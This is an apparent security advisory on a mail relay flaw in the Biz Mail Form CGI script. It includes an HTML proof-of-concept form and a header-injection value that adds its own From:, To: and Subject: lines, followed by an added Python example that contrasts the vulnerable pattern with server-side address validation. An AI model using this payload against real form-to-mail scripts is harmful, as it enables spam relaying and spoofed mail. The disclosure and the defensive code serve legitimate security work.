
Biz Mail Form Unauthorized Mail Relay Vulnerability

An exploit is not required.

The following proof of concept is available:

Place the following into an HTML file:
<HTML>
<HEAD> <TITLE>Exploit Test Page</TITLE> </HEAD>
<BODY>
<form action="http://www.example.com/cgi-bin/bizmail/bizmail.cgi"
method="POST" name="Subscribe">
<TEXTAREA rows="5" name="email"></TEXTAREA>
<INPUT TYPE="submit" VALUE="Submit" class="submit">
</FORM> </BODY> </HTML>

In the text area that appears, enter the following (begin by pressing
Enter to insert a blank line):

From:email@example.com
To:yourvalidemail@yourdomain.com
Subject:Exploit Test

This is a test

Click submit. You'll receive an email from the bizmail script, but
you won't receive the normal contact email. You can check the .dat
file and see a copy of what you sent.
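
The check a form-to-mail script needs before a submitted value reaches a mail header, shown beside the pattern that lets the multi-line value above add its own To: line. This is an added example, not part of the original advisory and not Biz Mail Form's code; the function names, the owner@example.com address and the way naive_message assembles the mail are assumptions made for illustration.

```python
import re
from email import message_from_string

# Constructed sample: the multi-line "email" value from the steps above.
POC_VALUE = ("\nFrom:email@example.com\nTo:yourvalidemail@yourdomain.com\n"
             "Subject:Exploit Test\n\nThis is a test")

OWNER = "owner@example.com"  # hypothetical address of the form's owner

# Conservative single-address pattern; deliberately stricter than RFC 5322.
ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def naive_message(email_field):
    """Hypothetical vulnerable pattern: form value pasted into the header block."""
    return (f"To: {OWNER}\nSubject: Contact form\n"
            f"Reply-To: {email_field}\n\nForm submitted.\n")


def recipients(raw_message):
    """Return every To: header a mail parser sees in the raw text."""
    return message_from_string(raw_message).get_all("To", [])


def clean_address(value):
    """Accept exactly one address; reject CR, LF and anything else."""
    # fullmatch, not match with '$': '$' would tolerate a trailing newline.
    if not ADDR_RE.fullmatch(value):
        raise ValueError("email field is not a single address")
    return value


def safe_message(email_field):
    """Same mail, but the field is validated before it reaches a header."""
    return naive_message(clean_address(email_field))


if __name__ == "__main__":
    print(recipients(naive_message(POC_VALUE)))        # injected To: is parsed
    print(recipients(safe_message("user@example.com")))
    try:
        safe_message(POC_VALUE)
    except ValueError as exc:
        print("rejected:", exc)
```

Validation has to happen on the server side, because the HTML page above is supplied by the submitter and can carry any field type it likes.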







 

Copyright 2008, SecurityFocus